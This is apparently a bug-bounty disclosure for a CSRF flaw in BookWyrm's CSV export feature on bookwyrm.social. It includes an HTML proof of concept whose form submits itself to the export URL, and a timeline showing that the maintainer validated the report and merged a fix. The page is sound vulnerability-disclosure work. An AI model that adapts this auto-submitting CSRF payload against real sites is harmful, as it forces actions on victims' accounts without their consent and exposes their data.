Cross-Site Request Forgery (CSRF) in bookwyrm-social/bookwyrm

Valid

Reported on

Jul 11th 2022


Description

An attacker is able to download data from a user via the CSV Export function. The export will include all the books on your shelves, books you have reviewed, and books with reading activity.

Vulnerable URL

https://bookwyrm.social/preferences/export/file

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://bookwyrm.social/preferences/export/file">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability is capable of download user reading data.

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. 23 days ago
Mouse Reeve validated this vulnerability 23 days ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve confirmed that a fix has been merged on f1ae64 23 days ago
The fix bounty has been dropped
export.py#L24-L52 has been validated
to join this conversation